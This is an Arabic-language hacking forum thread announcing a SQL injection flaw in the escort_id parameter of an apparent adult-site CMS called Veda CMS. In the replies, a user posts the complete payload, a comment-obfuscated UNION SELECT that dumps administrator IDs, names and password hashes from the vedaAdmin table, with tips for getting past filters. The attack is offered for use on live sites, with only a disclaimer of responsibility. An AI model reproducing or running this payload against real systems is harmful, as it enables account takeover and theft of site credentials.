# !! الثغره التي طرحت ستكون مسؤول في استخدامها أمام الله .. وأنا ابرء الذمه من الاستغلال السيئ لها ,, لأنها مجرد تطوير لمعلوماتك
كود PHP:
***************************************************
# Title: Veda CMS - SQL Injection
# Author: Dr.***
# Vendor Homepage: http://vedadesigns.net/
# Contact: u8p@hotmail.com ; skype: dr.***559
# Greets To: Brg alshmail - a!7rBi - x_man_3r3r - jsass - Hannibal Ksa - QaTaR-Attack - mr.hx - XP - r3m0t3Nu11 - xdr.devilx - ابو اميره
# !! الثغره التي طرحت ستكون مسؤول في استخدامها أمام الله .. وأنا ابرء الذمه من الاستغلال السيئ لها ,, لأنها مجرد تطوير لمعلوماتك
***************************************************
a) SQL Injection
parameter Infected ( escort_id )
# information english
# Most of the sites that ride pornographic Scripts - Loophole raised will be responsible in their use before God .. I exonerate disclosure of bad exploitation of her,, they just develop FYI
# information arabic
# معظم المواقع الي مركبه سكربت اباحية - وانا برئ براه كامله منها بستخدام سئ و مشاهده صور اباحية و غير ذلك
يا ريت توضح الثغره اكثر وتعمل شرح وتطبق في موقع علشان يكون مفهوم اكثر للاعضاء
واشكرك اخوي king alhrby1
ماشوف يحتاج لها شرح فقط يخش لموقع و يحط الاستغلال كامل
صح لكود مشفر و الكلمه المشفره هي n a m e
اقتباس:
لاهنت ع الثغره
لو ترفعها ملف txt احسن نص الكلام مشفر
شوف الاستغلال كامل
كود PHP:
/profile.php?escort_id=-4'+/*!12345UnIoN*/+/*!12345sElEcT*/+1,group_concat(admin_id,0x3a,admin_n a m e,0x3a,admin_pass),3,4,5,6,7,8,9,10,11+from+vedaAdmin--+--
امسح لفراغات الي عند n a m e
توقيع : king alhrby1
إذا تعمد الآخرين فهمك بطريقة خاطئة لا ترهق نفسك بالتبرير ، فقط أدر ظهرك و عطهم مقفاك و استمتع بالحياة